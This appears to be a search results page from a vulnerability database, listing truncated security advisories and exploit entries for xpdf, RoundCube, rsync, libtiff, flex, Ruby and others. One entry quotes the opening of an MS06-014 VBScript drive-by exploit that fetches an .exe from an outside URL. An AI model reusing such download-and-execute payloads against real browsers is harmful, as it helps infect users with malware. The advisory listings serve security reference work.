52 matches found
DSA-1790-1 xpdf - multiple vulnerabilities
Bulletin has no description...
RoundCube Webmail <= 0.2-3 beta Code Execution Vulnerability
No description provided by source. Public Release Date of POC: 2008-12-22 Author: Jacobo Avariento Gimeno Sofistic CVE id: CVE-2008-5619 Bugtraq id: 32799 Severity: Critical Vulnerability reported by: RealMurphy Intro ---- Roundcube Webmail is a browser-based IMAP client that uses "chuggnutt.com...
Design/Logic Flaw
os-prober in os-prober 1.17 allows local users to overwrite arbitrary files via a symlink attack on the (1) /tmp/mounted-map or (2) /tmp/raided-map temporary file. NOTE: the vendor disputes this issue, stating "the insecure code path should only ever run inside a d-i environment, which has no non-roo...
Debian Security Advisory DSA 106-1 (rsync)
The remote host is missing an update to rsync announced via advisory DSA 106-1. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only if(description)...
WORK system e-commerce <= 3.0.5 Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications. WORK system e-commerce <= 3.0.5 Remote File Inclusion Vulnerability. Rodrigo Duarte WORK system e-commerc...
Fedora Core 5 : libtiff-3.7.4-6 (2006-592)
The tiffsplit command contained code that handled fixed-size buffers insecurely, possibly leading to stack overflows. This problem is fixed in the updated package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable...
MS06014 net horse of a modification of the method-vulnerability warning-the black bar safety net
MS06014 net horse of a modification of the method By the constant QQ: 5 4 5 4 4 4 3 Look at the original code script language="VBScript" on error resume next dl = "http://www.baidu.com/heng.exe" Set df = document. createElement"object" df. setAttribute "classid",...
flex: Potential insecure code generation
Background: flex is a programming tool used to generate scanners (programs which recognize lexical patterns in text). Description: Chris Moore discovered a buffer overflow in a special class of lexicographical scanners generated by flex. Only scanners generated by grammars which use either REJECT, or...
Debian DSA-862-1 : ruby1.6 - programming error
Yutaka Oiwa discovered a bug in Ruby, the interpreter for the object-oriented scripting language, that can cause illegal program code to bypass the safe level and taint flag protections check and be executed. The following matrix lists the fixed versions in our distributions : old stable woody...
dcl15.txt
Name: Download Center Lite DCL Version: Location: Poland Email: groszynskif gmail com HP: http://shell.homeunix.org...
Overflow Vulnerabilities in hanterm
Hi, I'm xperc. hanterm is a Hangul terminal for X. It is based on the xterm in XFree86. The hanterm binary is installed by default with setuid root permissions on TurboLinux Server 6.5, but contains insecure code which allows unprivileged local users to obtain root access on the local system. $which...
Tech-Source Raptor GFX PGX32 2.3.1 - Config Tool
source: https://www.securityfocus.com/bid/1563/info Raptor GFX cards are designed to handle 24-bit true color applications such as Netscape, seismic, geographical information systems (GIS), satellite imaging, pre-press imaging and general desktop use...